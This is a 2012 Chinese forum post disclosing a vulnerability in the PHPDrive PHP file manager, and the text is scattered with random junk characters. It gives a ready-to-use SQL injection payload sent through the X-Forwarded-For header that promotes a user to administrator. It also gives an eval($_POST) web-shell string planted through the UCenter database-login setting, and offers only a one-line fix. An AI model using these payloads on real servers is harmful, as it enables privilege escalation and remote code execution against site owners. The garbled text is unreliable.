PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等
+ E6 u8 k0 D& L
7 c) V D6 C. m& U( Y8 q( {( lincludes/user.lib.php" |2 w* X4 z0 Z( d3 q
行87
/ m& B1 _9 t a5 t function get_ip() {
6 N2 z0 ^4 |% y N if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.
$ O# Z; e, g0 L在用户注册与登录 处module/disk/account.lead.php9 e& e7 l2 {6 {+ x* d7 W6 q- c
198行 $ y) L, m& F$ g
//更新本次登录IP和时间/ v; w; N2 S3 y+ H( `
$db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生
1 f% _) j2 q1 S M由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限+ S. H6 _/ T5 [" L, j7 r- B* {
实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.5 l$ h! V8 i( u: |- {. W- L1 J
后台getshell:3 \& h& \& p1 T% z3 T
在UCenter设置处,将UC数据库登录名填写为
# T/ e9 @4 e+ }$ e : _0 \( W4 H" X
root’);eval($_POST[DisKill]);?>/*
7 A0 X% V/ ]7 g# w! U& C3 @ U* w可以得到一个shell,位置在 data/uc.data.php; I3 ]0 X2 T! G& D' u6 F3 A1 Z
' ]; E( t8 J) W* M6 |" }$ v
修复:过滤注入+ M* }4 e" j0 i6 }
+ V# O% F2 h) Q6 c7 W- r+ s
|
发表于 2012-12-31 09:18:34
收藏
支持
反对